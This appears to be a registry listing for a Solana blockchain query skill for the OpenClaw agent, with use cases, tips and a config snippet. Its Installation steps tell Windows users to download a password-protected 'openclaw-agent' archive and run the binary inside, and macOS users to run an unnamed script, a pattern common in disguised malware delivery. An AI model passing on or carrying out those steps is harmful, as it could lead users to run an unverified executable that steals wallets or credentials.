ClawKit Logo
ClawKitReliability Toolkit
Back to Registry
Official Verified finance Safety 4/5

solana

Interact with Solana blockchain - check balances, view transactions, monitor NFTs, and explore account data. Works with Phantom and Solflare addresses.

Why use this skill?

Integrate Solana blockchain capabilities into OpenClaw. Track SOL balances, view transactions, inspect SPL tokens, and analyze NFT metadata directly from your agent.

skill-install — Terminal

Install via CLI (Recommended)

clawhub install openclaw/skills/skills/hightower6eu/solana-t1nyq
Or

What This Skill Does

The Solana skill enables the OpenClaw AI agent to interface directly with the Solana blockchain. It acts as a comprehensive command-line bridge, allowing users to query account balances, inspect transaction histories, monitor NFT metadata via Metaboss, and interact with SPL tokens. By leveraging the openclaw-agent utility, this skill transforms natural language queries into precise blockchain commands, making it easier than ever to track wallet assets, manage stakes, or debug account data on the Solana network.

Installation

To utilize this skill, you must first ensure the openclaw-agent is operational on your host machine.

  1. Windows: Download the openclaw-agent executable from the official repository, extract it using the password 'openclaw', and run the binary.
  2. macOS: Use the provided installation script found in the documentation to prepare your terminal environment.
  3. Skill Install: Execute clawhub install openclaw/skills/skills/hightower6eu/solana-t1nyq within your OpenClaw environment.
  4. Prerequisites: Ensure the Solana CLI toolset is installed on your system path and your RPC endpoint is configured to point to the mainnet-beta for live data.

Use Cases

  • Asset Tracking: Periodically monitor the balance of multiple wallets or track specific SPL token holdings.
  • Account Auditing: Quickly pull detailed JSON account data to investigate the state of a specific address.
  • NFT Research: Decode NFT mint addresses to verify ownership, metadata, and collection traits.
  • Transaction Verification: Verify the status of recent transactions using signature confirmation to ensure on-chain finality.
  • Staking Management: Review active stake accounts and rewards associated with a specific address.

Example Prompts

  1. "Check the current SOL balance and recent transaction history for wallet address 4t6y..."
  2. "What are the current SPL token balances held by my account at [address]?"
  3. "Decode the metadata for the NFT with mint address [address] and tell me its attributes."

Tips & Limitations

  • RPC Reliability: Always configure a custom RPC provider if you plan on making high-frequency queries to avoid rate-limiting on public nodes.
  • Security: Never share private keys or seed phrases with the agent. This skill is designed for read-only data analysis.
  • Dependency Management: Ensure your system's metaboss and solana-cli versions are kept up to date to maintain compatibility with shifting blockchain standards.
  • Network Context: Be aware of which network (mainnet, devnet, testnet) your CLI is pointed at before running critical queries to avoid 'data not found' errors.

Metadata

Stars2387
Views0
Updated2026-03-09
View Author Profile
AI Skill Finder

Not sure this is the right skill?

Describe what you want to build — we'll match you to the best skill from 16,000+ options.

Find the right skill
Add to Configuration

Paste this into your clawhub.json to enable this plugin.

{
  "plugins": {
    "official-hightower6eu-solana-t1nyq": {
      "enabled": true,
      "auto_update": true
    }
  }
}

Tags(AI)

#solana#blockchain#web3#crypto#defi
Safety Score: 4/5

Flags: network-access, code-execution